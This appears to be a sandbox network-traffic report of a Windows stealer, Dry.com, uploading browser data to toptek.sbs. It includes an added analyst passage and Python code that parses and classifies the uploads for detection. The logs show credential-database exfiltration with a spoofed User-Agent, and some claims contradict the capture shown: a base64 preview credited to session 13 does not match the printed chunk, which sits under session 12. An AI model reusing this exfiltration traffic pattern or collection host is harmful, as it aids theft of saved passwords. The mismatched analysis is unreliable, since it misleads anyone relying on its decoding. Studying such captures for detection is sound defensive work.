                                                       Accept-CH: Sec-CH-UA-Full-Version
                                                       Accept-CH: Sec-CH-UA-Arch
                                                       Accept-CH: Sec-CH-UA-Model
                                                       Accept-CH: Sec-CH-UA-Bitness
                                                       Accept-CH: Sec-CH-UA-Full-Version-List
                                                       Accept-CH: Sec-CH-UA-WoW64
                                                       Permissions-Policy: unload=()
                                                       Content-Disposition: attachment; filename="f.txt"
                                                       Date: Mon, 23 Dec 2024 05:21:38 GMT
                                                       Server: gws
                                                       X-XSS-Protection: 0
                                                       X-Frame-Options: SAMEORIGIN
                                                       Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                       Accept-Ranges: none
                                                       Vary: Accept-Encoding
                                                       Connection: close
                                                       Transfer-Encoding: chunked
2024-12-23 05:21:39 UTC  35                 IN         Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                       Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-23 05:21:39 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                                       Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.4  49766        94.130.188.57   443               7548  C:\Users\user\AppData\Local\Temp\245347\Dry.com

Timestamp                Bytes transferred  Direction  Data
2024-12-23 05:21:42 UTC  322                OUT        POST / HTTP/1.1
                                                       Content-Type: multipart/form-data; boundary=----LFUK68QQ1DJEUA1VAIW4
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                       Host: toptek.sbs
                                                       Content-Length: 505
                                                       Connection: Keep-Alive
                                                       Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:42 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 46 55 4b 36 38 51 51 31 44 4a 45 55 41 31 56 41 49 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 55 4b 36 38 51 51 31 44 4a 45 55 41 31 56 41 49 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 55 4b 36 38 51 51 31 44 4a 45 55 41 31 56 41 49 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------LFUK68QQ1DJEUA1VAIW4Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------LFUK68QQ1DJEUA1VAIW4Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------LFUK68QQ1DJEUA1VAIW4Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:43 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
12         | 192.168.2.4 | 49768       | 94.130.188.57  | 443              | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:43 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Q9RQQIMOZU3E3EKX4OHV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 213453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 51 39 52 51 51 49 4d 4f 5a 55 33 45 33 45 4b 58 34 4f 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 51 39 52 51 51 49 4d 4f 5a 55 33 45 33 45 4b 58 34 4f 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 51 39 52 51 51 49 4d 4f 5a 55 33 45 33 45 4b 58 34 4f 48 56 0d 0a 43 6f 6e 74
Data Ascii (CRLFs restored from the hex dump):
    ------Q9RQQIMOZU3E3EKX4OHV
    Content-Disposition: form-data; name="token"

    a66c99b4ea1107d67781e132b296cd32
    ------Q9RQQIMOZU3E3EKX4OHV
    Content-Disposition: form-data; name="build_id"

    dadb5e51ebe3ba12afb7fbe624d12a2b
    ------Q9RQQIMOZU3E3EKX4OHV
    Cont
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:43 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:45 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:21:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
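
The three uploads in sessions 11, 12 and 13 share one shape: a multipart/form-data body whose first two parts are a 32-hex "token" and a 32-hex "build_id" (the same two values in every session), followed by a large part that is base64 text (the long runs of "A" are encoded zero bytes). The second 16355-byte chunk of session 13 base64-decodes, once re-aligned to a 4-character group boundary, to the tail of Chromium's Login Data "logins" table definition ("... keychain_identifier BLOB, UNIQUE (origin_url, username_element, username_value, password_element, signon_realm))"), so that upload is a browser credential database. The sender is Dry.com running from %TEMP% while the User-Agent claims Opera on macOS, and the server answers each upload with a chunked body carrying only "ok". The Python below is an added example written for this report, not Joe Sandbox or sample code: it rebuilds the session-11 body from the values in the hex dump, parses it back, classifies it on those indicators, and applies the re-alignment trick to the session-13 preview. The third part's field name "file", its filename and the FAKE_DB contents are constructed stand-ins (the report cuts the first chunk off after "Cont"), and build_post_body, parse_multipart, decode_base64_preview and classify_upload are this example's own helpers.

```python
"""Parse a Vidar-style multipart exfiltration POST and inspect its payload.
Added example for this report (not Joe Sandbox or sample code): boundary, token,
build_id and the hex/base64 strings are copied from the session 11 and 13 dumps;
anything marked CONSTRUCTED stands in for data the report truncates."""
import base64
import re

BOUNDARY = "----LFUK68QQ1DJEUA1VAIW4"           # body delimiter is "--" + BOUNDARY
TOKEN = "a66c99b4ea1107d67781e132b296cd32"
BUILD_ID = "dadb5e51ebe3ba12afb7fbe624d12a2b"
# First 80 bytes of the session-11 "Data Raw" line (through the token's "a66c").
REPORT_PREFIX_HEX = (
    "2d 2d 2d 2d 2d 2d 4c 46 55 4b 36 38 51 51 31 44 4a 45 55 41 31 56 41 49 57 34 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 "
    "74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63")
# Start of the second 16355-byte chunk of session 13: base64 cut mid-group.
REPORT_B64_PREVIEW = (
    "2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBr"
    "ZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVu"
    "dCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQ"
    "AAAAAAAAAAAAAAAAAAAAAA")
# CONSTRUCTED stand-in for the stolen file. Real uploads carry a SQLite database
# (the session-13 preview decodes to the tail of Chromium's "logins" DDL).
FAKE_DB = (b"SQLite format 3\x00" + b"\x00" * 48
           + b"CREATE TABLE logins (origin_url VARCHAR NOT NULL, "
           b"password_value BLOB, signon_realm VARCHAR NOT NULL)")
HEX32 = re.compile(r"^[0-9a-f]{32}$")


def build_post_body(boundary, parts):
    """Lay out a body the way the sample does: "--boundary", Content-Disposition,
    blank line, value, each CRLF-terminated, then the closing "--boundary--"."""
    delim = b"--" + boundary.encode()
    out = bytearray()
    for name, value, filename in parts:
        disp = 'Content-Disposition: form-data; name="%s"' % name
        if filename is not None:
            disp += '; filename="%s"' % filename
        out += delim + b"\r\n" + disp.encode() + b"\r\n\r\n" + value + b"\r\n"
    return bytes(out + delim + b"--\r\n")


def parse_multipart(body, content_type):
    """Split a captured body on the Content-Type boundary -> {name: value}. Only one
    trailing CRLF is stripped per part, so binary values come back intact."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if m is None:
        raise ValueError("Content-Type carries no boundary")
    delim = b"--" + m.group(1).encode()
    fields = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):                    # closing "--boundary--"
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        name = re.search(rb';\s*name="([^"]*)"', head)  # does not match filename=
        if name:
            fields[name.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def decode_base64_preview(preview):
    """The report prints the first bytes of each chunk, and a 16355-byte cut rarely
    lands on a 4-char base64 group: try all four alignments, keep the most printable."""
    best, best_score = b"", -1
    for shift in range(4):
        s = "A" * shift + preview
        blob = base64.b64decode(s[:len(s) - len(s) % 4])
        score = sum(32 <= b < 127 for b in blob)
        if score > best_score:
            best, best_score = blob, score
    return best


def classify_upload(fields):
    """Indicators to key on: 32-hex "token" and "build_id" plus a base64 SQLite part."""
    ids_ok = all(HEX32.match(fields.get(k, b"").decode("ascii", "replace"))
                 for k in ("token", "build_id"))
    sqlite_parts = []
    for name, value in fields.items():
        if name in ("token", "build_id"):
            continue
        try:
            blob = base64.b64decode(value, validate=True)
        except ValueError:                             # binascii.Error subclasses it
            continue
        if blob.startswith(b"SQLite format 3\x00") or b"signon_realm" in blob:
            sqlite_parts.append(name)
    return {"ids_ok": ids_ok, "sqlite_parts": sqlite_parts,
            "suspect": ids_ok and bool(sqlite_parts)}


def demo():
    """Rebuild session 11's upload from the report's values, parse and classify it."""
    body = build_post_body(BOUNDARY, [("token", TOKEN.encode(), None),
                                      ("build_id", BUILD_ID.encode(), None),
                                      ("file", base64.b64encode(FAKE_DB), "Login Data")])  # CONSTRUCTED
    fields = parse_multipart(body, "multipart/form-data; boundary=" + BOUNDARY)
    return {"body": body, "fields": fields, "verdict": classify_upload(fields),
            "preview_text": decode_base64_preview(REPORT_B64_PREVIEW)}
```

demo()["body"] starts with exactly the 80 bytes in REPORT_PREFIX_HEX, which is the check that the rebuilt layout matches the capture; demo()["verdict"] comes back with "suspect" set, and demo()["preview_text"] holds the logins DDL tail from the session-13 chunk. The same parse_multipart/classify_upload pair can be pointed at a body pulled from a proxy or PCAP, where the boundary comes from the request's own Content-Type header; the 12-byte reply "2\r\nok\r\n0\r\n\r\n" in session 11 is just an HTTP chunked encoding of "ok", so the round trip is complete once that is seen.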


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  13192.168.2.44976994.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:44 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----US0R9RI58YM7YMGLX4W4
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 55081
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
